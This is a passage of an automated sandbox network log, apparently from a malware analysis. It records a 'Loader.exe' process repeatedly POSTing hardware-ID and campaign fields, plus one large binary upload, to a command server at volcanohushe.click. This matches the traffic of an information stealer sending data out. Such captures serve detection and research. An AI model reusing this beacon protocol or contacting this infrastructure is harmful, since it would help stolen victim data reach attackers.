2024-12-24 01:17:12 UTC	15084	OUT	Data Raw: 2d 2d 54 48 4d 36 5a 58 49 55 50 46 33 4a 54 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 37 44 30 42 36 41 35 33 41 45 45 33 36 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 54 48 4d 36 5a 58 49 55 50 46 33 4a 54 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 48 4d 36 5a 58 49 55 50 46 33 4a 54 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 54 48 4d 36 5a Data Ascii: --THM6ZXIUPF3JTHContent-Disposition: form-data; name="hwid"E887D0B6A53AEE368246926E533C64D7--THM6ZXIUPF3JTHContent-Disposition: form-data; name="pid"2--THM6ZXIUPF3JTHContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--THM6Z
2024-12-24 01:17:13 UTC	1134	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:17:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0dt54tehclob35v0ocfl0v9ci9; expires=Fri, 18 Apr 2025 19:03:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JXrPgLOL9wmYyo7XHfZLOYuVcCwRbL%2Fty6ZNIgmHleRWjdPQ%2FIw166AbaWRbzbh6HDGfYkFaU6GNaYqdQHYeFB55cwL0BlltwRcjEsE%2FfN59DzdMHIOpMN96mmq%2FCkXJc6fh4WY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cc018fa5043c3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1602&rtt_var=660&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2842&recv_bytes=16022&delivery_rate=1587819&cwnd=211&unsent_bytes=0&cid=799cea8670083d0f&ts=1238&x=0"
2024-12-24 01:17:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 01:17:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49723	172.67.145.201	443	504	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:17:15 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RFJR6IVX9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19912 Host: volcanohushe.click
2024-12-24 01:17:15 UTC	15331	OUT	Data Raw: 2d 2d 52 46 4a 52 36 49 56 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 37 44 30 42 36 41 35 33 41 45 45 33 36 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 52 46 4a 52 36 49 56 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 46 4a 52 36 49 56 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 52 46 4a 52 36 49 56 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --RFJR6IVX9Content-Disposition: form-data; name="hwid"E887D0B6A53AEE368246926E533C64D7--RFJR6IVX9Content-Disposition: form-data; name="pid"3--RFJR6IVX9Content-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--RFJR6IVX9Content-D
2024-12-24 01:17:15 UTC	4581	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e Data Ascii: 2+?2+?o?Mp5p_oI
2024-12-24 01:17:16 UTC	1126	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:17:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ukt1j8rjh3ib938jr3vr1pdd58; expires=Fri, 18 Apr 2025 19:03:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yWm2LYcnD5qEQH9qMoge5I65l12EWppgH6lbJwkdiXkiYQVlcyPB1AVawsT8ZabT6tqp5yy6WcLZAZLRYZpiFTTDiMXT3ysRHwod5AMbwwtH5Jtr5B2%2BbNmyGBbTzALX4G9KwX8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cc02c7cc842ef-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1553&rtt_var=964&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2843&recv_bytes=20867&delivery_rate=947436&cwnd=218&unsent_bytes=0&cid=5f5dcf0d80269053&ts=977&x=0"
2024-12-24 01:17:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 01:17:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49730	172.67.145.201	443	504	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:17:18 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0E53ER9TEJJPPHBTI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1231 Host: volcanohushe.click
2024-12-24 01:17:18 UTC	1231	OUT	Data Raw: 2d 2d 30 45 35 33 45 52 39 54 45 4a 4a 50 50 48 42 54 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 37 44 30 42 36 41 35 33 41 45 45 33 36 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 30 45 35 33 45 52 39 54 45 4a 4a 50 50 48 42 54 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 45 35 33 45 52 39 54 45 4a 4a 50 50 48 42 54 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c Data Ascii: --0E53ER9TEJJPPHBTIContent-Disposition: form-data; name="hwid"E887D0B6A53AEE368246926E533C64D7--0E53ER9TEJJPPHBTIContent-Disposition: form-data; name="pid"1--0E53ER9TEJJPPHBTIContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl
2024-12-24 01:17:19 UTC	1126	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:17:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a6thjfji10a66ofuice71tqto7; expires=Fri, 18 Apr 2025 19:03:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BovA30wopFJOav14gcVPBpGuMXT3oDPd44tltxeoIIiIv%2F7KmpKUYJxY9iC5ZysGylEXjfuHotIo7war95bTKIVEwwGeK4GHFLxee5VJY35UapBUFVlEAQY76GWGnvnUVNryqOc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cc0416a3815c3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1673&rtt_var=658&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2149&delivery_rate=1745367&cwnd=252&unsent_bytes=0&cid=7cad3ce6dc8eb753&ts=778&x=0"
2024-12-24 01:17:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 01:17:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49743	172.67.145.201	443	504	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:17:21 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=EMRBGJPTQMJ4B8SPM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 575935 Host: volcanohushe.click
2024-12-24 01:17:21 UTC	15331	OUT	Data Raw: 2d 2d 45 4d 52 42 47 4a 50 54 51 4d 4a 34 42 38 53 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 37 44 30 42 36 41 35 33 41 45 45 33 36 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 45 4d 52 42 47 4a 50 54 51 4d 4a 34 42 38 53 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 4d 52 42 47 4a 50 54 51 4d 4a 34 42 38 53 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c Data Ascii: --EMRBGJPTQMJ4B8SPMContent-Disposition: form-data; name="hwid"E887D0B6A53AEE368246926E533C64D7--EMRBGJPTQMJ4B8SPMContent-Disposition: form-data; name="pid"1--EMRBGJPTQMJ4B8SPMContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl
2024-12-24 01:17:21 UTC	15331	OUT	Data Raw: 8a 81 37 2d 8d 1c 3a 11 fb b1 4f b6 4f 08 9c 4d 4a 77 f2 c0 81 66 a5 8d 20 53 74 ac 44 96 53 39 a4 a8 0e 53 25 f8 a5 da c8 e4 fb 98 1a 1e ff 09 21 a5 dd b2 3e ce 5c 28 66 14 4a 78 b1 3c a5 ce 9b de 7f 8f 5a 6d a1 a0 35 0c cb f7 96 02 1b 77 de cf d2 32 4c f1 29 cc 3c 25 6d b3 39 d0 4d 89 d5 e0 2c ca 25 ad 2a d5 8e be c9 f0 e5 e4 0b 91 49 34 c4 9f 08 6e c8 ae 7e bb 09 1b 4a 14 3e 0d 37 c2 c2 fe bf 20 f6 e6 47 51 e5 cf 6a 35 03 22 79 20 71 69 8c 39 f9 f9 12 df 57 a5 a4 2e 2c b7 e1 83 fa 05 24 a0 a1 52 bc d0 af 24 b4 a0 96 81 d2 c9 c9 2e f1 7b 7d 21 0c d9 df b6 8b d9 34 ad d0 de 7a c0 9f d6 c7 cc a9 71 53 0a 39 cb 8a 6c b1 8d 25 93 f6 07 ea bc cf d3 9a 63 ca ee e0 2b 64 15 43 46 2c 39 38 b1 65 df 08 5d 1a 22 3b c2 eb dc 5a af 49 5c 32 12 f4 b7 a3 a2 d4 c1 c4 Data Ascii: 7-:OOMJwf StDS9S%!>\(fJx<Zm5w2L)<%m9M,%*I4n~J>7 GQj5"y qi9W.,$R$.{}!4zqS9l%c+dCF,98e]";ZI\2
2024-12-24 01:17:21 UTC	15331	OUT	Data Raw: cf 50 b5 b2 a4 53 8b 96 da bc 14 4f ed 1d 81 5c 68 f2 4b b5 bb 3b eb 75 b1 b5 52 44 e5 e8 9f ed ff 2f 3c 6c 3e 53 88 54 ad bb bc ab b3 9a ee dc 22 a6 f9 67 53 d9 a5 d3 53 2a 47 8c 09 84 1d 5e ef b5 12 48 2b 69 43 77 03 6f f7 d3 e3 14 04 93 ef 42 46 1a 28 d5 42 b5 4e b7 87 bd 66 87 a2 03 8a 82 a3 62 82 9c 11 c8 6a 12 a6 19 61 d9 14 5e 4a c0 b0 24 7b 1e b5 ad aa 25 df ad 33 19 44 fa 37 e1 6a a3 5d e6 f3 78 ee e3 0a 51 08 59 a5 db 3d cf a4 08 10 c6 94 1d e9 51 a1 71 eb 6f 3e 7b 6f 09 2b 53 5f fb 1c ea 83 de 3e 5a bd 43 b1 74 33 69 9b 4a 14 7c 63 52 65 38 c2 3e 37 8c 65 62 b7 7e 8f 6e fd a3 29 c1 69 07 6a ab ba ed 96 66 fe f8 a4 de 90 f3 fb bd 81 32 a3 6b 1e 81 b3 6f df 57 fe 79 50 c2 e6 4c 2f 7f 5e 39 59 67 50 c3 a1 ec f9 45 10 b4 92 56 eb 63 d7 56 de 9e 46 Data Ascii: PSO\hK;uRD/<l>ST"gSS*G^H+iCwoBF(BNfbja^J${%3D7j]xQY=Qqo>{o+S_>ZCt3iJ\|cRe8>7eb~n)ijf2koWyPL/^9YgPEVcVF
2024-12-24 01:17:21 UTC	15331	OUT	Data Raw: f3 9a 57 71 89 e2 07 9f 4f d2 53 97 0a ff ac 41 19 5d c5 1e 38 ca cb 43 3a c7 d2 9a 97 49 8b e7 6f 4c ec 8c 3f 9e ab d7 78 9e 1b 74 d2 22 47 f8 1f 2a 71 5d 69 b4 19 13 d0 f1 d2 64 42 36 dc 8d 66 50 38 3a 56 03 b3 5f 61 3c 7a 75 29 c0 b1 be 49 cd 30 60 9a 9b 3b e4 ec b4 fb 23 61 56 f6 aa f2 28 af 8c a9 d8 4c a2 6a ac 78 71 58 aa 8b 9d 1e dc 66 37 e5 de 11 87 52 01 f0 ce 94 a7 a9 f6 79 5f 48 47 f0 e6 3a 8d 2d de c1 32 5f 4c 18 f3 dc 59 f9 f0 d3 b5 08 2f 2e 35 c8 73 52 95 01 4e 7b d5 f6 2d bd 5d c3 76 85 86 c6 f3 82 1d 79 f2 9b ac 57 62 1f 10 77 0b ce 48 91 0f 1d 41 51 8f 4b 41 e1 1b eb 03 cd 5d f1 af 0f 92 69 92 9b 71 48 f0 ae 23 84 20 06 98 67 94 ef a5 69 b1 f4 79 7d 95 cf 7e d0 47 47 76 9c a4 61 c1 67 c1 d7 7f 79 8d ba 6d a4 80 eb 45 a3 74 7a 0f ad 70 95 Data Ascii: WqOSA]8C:IoL?xt"G*q]idB6fP8:V_a<zu)I0`;#aV(LjxqXf7Ry_HG:-2_LY/.5sRN{-]vyWbwHAQKA]iqH# giy}~GGvagymEtzp
2024-12-24 01:17:21 UTC	15331	OUT	Data Raw: 14 d8 bc 43 77 9e 08 f1 7b a2 20 00 bb 6f d6 46 14 d7 f6 34 89 f0 c8 51 fc 5b 97 84 5f 94 19 91 03 b7 21 27 3c 38 30 22 f0 93 5b e8 c3 75 6f ed 68 e2 4c de e5 3b d9 a0 26 70 64 61 e8 53 46 10 24 41 98 d0 ad a8 3a 1b 6f 19 d9 89 34 9c c4 aa a0 c2 ef 13 26 9f 73 69 42 37 b0 dd a1 7c ec b1 89 3f d2 50 e7 b0 de c5 75 84 f7 9e f4 ba e8 ff bd f1 d7 21 35 0b 83 26 fd a9 76 2f 90 7e fe 86 98 2d 22 7d 63 43 59 56 79 74 0a f6 4c ce 2f d6 1d 53 c5 f1 09 1f 7f f8 4e f8 c4 76 2d d9 98 ee 77 a2 52 63 0e 61 a2 7c 42 25 e8 a7 b1 24 90 3c 2e 9a f0 ff 0f d6 ff 2d 66 f4 36 f0 ae 18 e9 b6 35 89 fc 23 a1 a5 a6 fc 08 32 59 8b 9d 97 06 bf 36 d0 fd 85 1e 09 59 3e d8 c8 c3 83 f5 15 27 27 e4 02 19 3b b3 7f 24 02 00 3e 8e 0a 38 95 fb 17 24 e4 c7 b3 e5 b9 ce 42 e9 77 a6 6e 5f aa cc Data Ascii: Cw{ oF4Q[_!'<80"[uohL;&pdaSF$A:o4&siB7\|?Pu!5&v/~-"}cCYVytL/SNv-wRca\|B%$<.-f65#2Y6Y>'';$>8$Bwn_
2024-12-24 01:17:21 UTC	15331	OUT	Data Raw: ae 11 5b 7e 0d c6 ee c3 76 7c 8f 0f d1 7b b2 9d 1c 3a 53 3b a9 f3 37 44 80 d5 58 9a 86 c5 4b 2b 84 6e 0b 6f 59 22 aa 2b ee 0c ac b0 76 e8 c4 fd a4 5a 17 9b 16 47 44 c5 84 46 0a 73 5e fd 4b 6c 23 0e 35 9a 8e 34 24 8a 7d c8 ba 1d 6d 96 04 3a a0 89 82 8b a2 e5 b7 f1 eb d1 c4 d4 8f f2 96 38 f8 9d 20 9e 31 33 ce 87 50 23 12 fb 50 24 25 40 3f 66 f0 bf 48 bb fb df c6 4a 4d 12 c4 7e ef aa c3 8c 90 d8 a1 c3 44 4b 30 74 8c 00 e0 68 00 9a 22 7a 05 cc 3f 6a 6f f7 d4 79 70 1c 38 bd b8 29 e9 d4 af 8b a0 6d 23 29 34 35 88 0b 75 dd 3d c4 08 0b 12 1c 04 f7 eb 28 12 80 c1 1b bd 78 6b be 55 06 4c 5c 58 d7 66 b5 0b 4f d2 70 28 29 cc 5f 98 68 10 e5 b0 40 d9 91 6a 61 ee 5e 7e d6 13 ff 97 8c d2 75 e7 ee b9 3f 4a 35 23 07 7f dd d1 16 ba e1 d1 1e 54 18 7c f1 19 44 9b ea 3d 9b b4 Data Ascii: [~v\|{:S;7DXK+noY"+vZGDFs^Kl#54$}m:8 13P#P$%@?fHJM~DK0th"z?joyp8)m#)45u=(xkUL\XfOp()_h@ja^~u?J5#T\|D=
2024-12-24 01:17:21 UTC	15331	OUT	Data Raw: d9 3f b7 a1 a8 a9 4c 89 71 02 7e e1 68 79 d3 59 09 25 b9 31 b7 51 95 77 d7 d2 b2 65 53 88 e0 2b 94 bf 04 a0 ef e5 36 c1 99 48 42 5c 32 2f f7 fc 9d 76 9e 7c 7e 3b 99 73 fa fe 46 7c 56 d2 84 6e 35 2b 2b 3e eb 75 32 55 04 e4 7d fd 1e 91 3e 6c 63 40 1e fd 00 87 f8 e0 cb 8e 31 b5 d6 69 17 09 56 f7 9b 83 f0 92 0e e5 cf 92 aa 63 43 13 b0 a3 aa c0 7e b5 e4 4e 7d 85 e0 05 a0 9a c6 64 e5 cc 30 af f2 49 dd 7a b7 52 c7 fb dd 44 79 80 6f c8 4d a1 12 af 9c 27 c3 d1 7b 94 5f 89 82 47 06 33 ab 75 2d 48 ef 31 b4 f8 eb 5b 7b 8d 71 58 a8 75 d8 ea 6c 90 1e 9b 25 f8 9c c5 d2 e0 7d 58 24 6d e4 e6 af ad 09 a4 f6 eb d6 e8 f2 53 66 39 ee fd dd d3 4a 8f 71 b7 88 43 eb ec 2c 85 55 77 61 41 e6 46 0e 3a ba 3e 51 c9 ae f0 9f 7f fe 75 03 ee 07 01 ef 22 04 a6 41 8d 07 b5 06 c9 b3 af 8f Data Ascii: ?Lq~hyY%1QweS+6HB\2/v\|~;sF\|Vn5++>u2U}>lc@1iVcC~N}d0IzRDyoM'{_G3u-H1[{qXul%}X$mSf9JqC,UwaAF:>Qu"A
2024-12-24 01:17:21 UTC	15331	OUT	Data Raw: 4d 4f 88 dd 1b 9c da 98 07 a1 9c 64 c1 dc fd d2 80 d2 60 76 4b b7 73 84 d9 38 d4 90 f8 08 c9 65 af 36 13 cb a2 d9 e7 7e 00 fc 5c b5 c6 41 35 aa 8f 7f d4 4b 76 bb f2 f2 ae 84 0c 28 43 a0 04 53 d2 ad c2 b2 86 48 ac 47 77 24 35 d8 27 04 66 8b aa 8f b2 0c 0d ae be 54 7b 80 a4 8a 74 be da c2 16 56 ef df 18 8a 1d d3 3a ac 3b 36 24 4c 90 a2 ef 93 be 0b 65 10 37 5e 53 04 26 5c 05 c6 14 b0 9c dc c2 21 ed d1 8e 9a d3 c1 4e 3a 44 3c d0 d4 10 fe 8b 97 82 3f 3d 28 f8 24 92 6f 8e c8 09 53 de a4 07 b1 cd d9 e9 cb 21 31 35 ef 53 25 9a 51 58 c2 63 6a a5 6a 68 f3 2d ad a7 11 c5 7a 91 82 6d 41 df 7c 3e 04 2d 72 02 4f 6d 9c fd 0f a9 59 a6 b0 51 5e 4c a4 4e b7 8e 26 dd ca fe dd 62 5d 38 bf 62 b9 77 e8 7a be a1 4e 18 e3 cb 23 3e cd bd 25 98 43 4a b6 ff 98 72 b5 54 18 44 ee b3 Data Ascii: MOd`vKs8e6~\A5Kv(CSHGw$5'fT{tV:;6$Le7^S&\!N:D<?=($oS!15S%QXcjjh-zmA\|>-rOmYQ^LN&b]8bwzN#>%CJrTD
2024-12-24 01:17:21 UTC	15331	OUT	Data Raw: 60 47 69 9d ff 0f 4d 3c 8c aa fc 94 50 1c bf 2b b9 41 f5 ae 69 70 5a 61 55 e6 3e 9c 55 0a a3 62 55 20 c6 c1 77 1c df d1 43 eb e9 a7 0b d5 f1 d7 68 5a 53 da af e6 9f ac 91 c3 e1 25 d3 69 85 83 2d e6 41 8c e6 a2 63 eb 13 e7 be 73 a3 8c a3 01 08 2b 7a f9 ad c6 f5 7f 47 e5 d7 11 74 69 c2 80 38 80 e1 f0 9d 09 d2 5e ed 58 67 ea 3b 40 e6 65 1f 4b 4e 4d 81 f1 9b 8b b2 9a 05 bf f8 e9 81 ff 9c 22 7d 0e 4b 0a 51 17 8d 60 58 49 90 9d 88 73 ed a6 a8 ee 48 fa 59 54 aa 1f 1b ff 07 dd 1f 05 b6 44 d9 ed 52 92 01 1d 75 a7 57 95 14 fe 39 93 1a c7 3c ed f0 33 52 58 e6 80 e0 37 45 f9 74 aa ff f6 e9 8a 71 23 34 97 ad a6 6d 59 82 9c 03 d5 bd f8 b4 1b 68 c1 d6 31 7a 6b 19 90 5a 45 4f 9a f5 a7 78 93 5a 78 7f 9f ae 71 51 5d 6a d2 a3 ea ee ff 6d 97 9d 91 80 d6 12 89 9f 9c 5f a8 11 Data Ascii: `GiM<P+AipZaU>UbU wChZS%i-Acs+zGti8^Xg;@eKNM"}KQ`XIsHYTDRuW9<3RX7Etq#4mYh1zkZEOxZxqQ]jm_
2024-12-24 01:17:21 UTC	15331	OUT	Data Raw: 31 3f 4e 3e 3f 11 86 05 0a f4 21 c1 58 23 d9 4c f9 61 85 e7 f4 12 2c be 31 47 73 cd 5d 28 51 0a e7 24 75 0c 58 61 c9 98 b9 c3 0d 43 6d d0 db da 7b 13 0e b1 06 6d 3b bd 68 76 ad 1d 62 7b 2a ba c5 61 27 16 84 c8 f9 65 13 ce 26 d1 54 5d 8d 92 ed a5 80 39 4b d9 e0 69 b6 90 28 21 53 67 f3 d6 49 0f 70 d1 32 b3 6c 49 14 70 9d ee f7 ae 91 46 fa 40 6f c6 26 cb f5 6d 08 f5 75 aa 26 94 61 6a ac bf 8d 5f 2e 22 17 5c 08 fa f2 43 f8 a6 d2 3e d6 cf 47 54 54 94 fa 01 9e 2d 34 bb 7d 67 40 11 53 a5 f2 2a 4a f7 17 8a bf 20 76 04 8f a8 fa 20 05 a3 22 a3 e3 74 44 4e ec a4 64 38 14 0e f6 47 8d 54 05 80 7d 13 6c 1e b0 87 c5 fd 67 f1 c9 05 dc ed 9c 66 4f 64 3e e1 df 19 77 7d 8d 31 34 b6 5c 3d da cf 2f c4 19 e7 e4 b7 1c d8 46 06 ad 25 1d 8c 9b 37 08 ed 31 9d c8 db f4 9b f0 66 f9 Data Ascii: 1?N>?!X#La,1Gs](Q$uXaCm{m;hvb{a'e&T]9Ki(!SgIp2lIpF@o&mu&aj_."\C>GTT-4}g@SJ v "tDNd8GT}lgfOd>w}14\=/F%71f
2024-12-24 01:17:25 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:17:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=72m289a8ng3u4o0icbtphg7ofj; expires=Fri, 18 Apr 2025 19:04:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YS9pd5J4nanzBwQSgmOfJVGx1exhjWeNZl0E7IBpHH8vV71yCaU0dnGfebusM7Ai6NtzcLHm2wqD3PfY0AqeHli1DagcQSEtesG5v6zn4wdO%2BBzjCnmvlsnN8Q594FwqJBXZTkM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cc054eccf7cf3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1937&rtt_var=729&sent=208&recv=604&lost=0&retrans=0&sent_bytes=2844&recv_bytes=578505&delivery_rate=1499743&cwnd=218&unsent_bytes=0&cid=f772a4a80a73a958&ts=3425&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49754	172.67.145.201	443	504	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
